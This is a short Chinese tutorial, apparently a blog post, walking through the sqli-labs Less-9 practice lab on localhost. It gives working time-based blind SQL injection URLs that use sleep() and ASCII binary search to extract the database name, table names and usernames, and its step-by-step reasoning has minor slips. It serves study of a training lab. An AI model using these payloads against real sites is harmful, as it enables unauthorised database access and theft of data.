sqli-labs(9)

爆当前数据库民称 这里我们使用二分法进行

http://127.0.0.1/sql1/Less-9/?id=1%27%20and%20if(ascii(substr(database(),1,1))%3E114,%200,sleep(5))%20%23

立刻返回 证明第一个字母大于114

http://127.0.0.1/sql1/Less-9/?id=1%27%20and%20if(ascii(substr(database(),1,1))%3E115,%200,sleep(5))%20%23

过了5秒才返回 证明字母小<115 应该是ascii115 s

这里我们假设我们把库民报出来了 我们要爆表民

0X02爆表名

http://127.0.0.1/sql1/Less-9/?id=1%27%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E100,%200,sleep(5))%20%23

直接返回大于100

http://127.0.0.1/sql1/Less-9/?id=1%27%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E105,%200,sleep(5))%20%23

过了5秒才返回  那么这是错误的

101-105之间

这里就不一一举例了

爆列名 一样的构造方法

这里来看一下爆字段的语句构造方法

http://127.0.0.1/sql1/Less-9/?id=1%27%20and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E100,%200,sleep(5))%20%23

这里 小编还是想去写一个脚本

等以后发出来吧

sqli-labs(9)

标签：基于   就是   mat   直接   ascii   code   重定向   sleep   数据库